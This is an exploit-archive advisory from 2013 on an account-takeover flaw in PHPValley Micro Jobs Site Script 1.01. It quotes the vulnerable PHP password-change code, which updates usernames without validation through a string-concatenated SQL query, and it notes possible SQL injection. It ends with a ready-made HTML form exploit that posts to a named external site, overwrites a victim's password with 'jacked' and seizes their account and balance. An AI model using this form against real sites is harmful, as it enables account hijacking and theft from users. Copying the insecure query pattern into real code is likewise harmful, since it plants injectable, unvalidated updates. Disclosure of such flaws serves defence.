Home / exploits PHPValley Micro Jobs Site Script 1.01 Account Takeover
Posted on 28 April 2013
Author: Jason Whelan PacketStorm: exploitdev Email: exploitdevj@gmail.com Target Software: PHPValley Micro Jobs Site Script 1.01 Vendor URL: http://phpvalley.com/ Demo: http://phpvalley.com/demo Account Takeover Vulnerability This vulnerability allows users to edit their username, which the script doesn't account for. Editing your username to that of a current user allows the attacker to takeover their account, including using or depositing their balance. The vulnerability exists in php/change_pass_content.php: if (isset($_POST['changepass'])) { $cpass=md5($_POST['cpass']); $npass=trim($_POST['npass']); $npassc=trim($_POST['npassc']); $username=trim(strtolower($_POST['auser'])); if($npass == $npassc && !empty($npass)){ $query = "UPDATE members SET username='".$username."', password='".md5(strtolower($npass))."' where username='".$_SESSION['userName']."' and password='$cpass'"; This code doesn't validate the username that is being updated. SQL injection might also be possible, but the length is limited here. Exploit: <!-- be logged into your own account, edit info below: --> <form method="post" action="http://webfiver.com/change_pass.php"> <input name="changepass" type="hidden" value="Update" /> Target Username: <input name="auser" type="text" /> Your Password: <input name="cpass" type="password" /> <input name="npass" type="hidden" value="jacked" /> <input name="npassc" type="hidden" value="jacked" /> <input type="submit" value="Jack" /> </form>
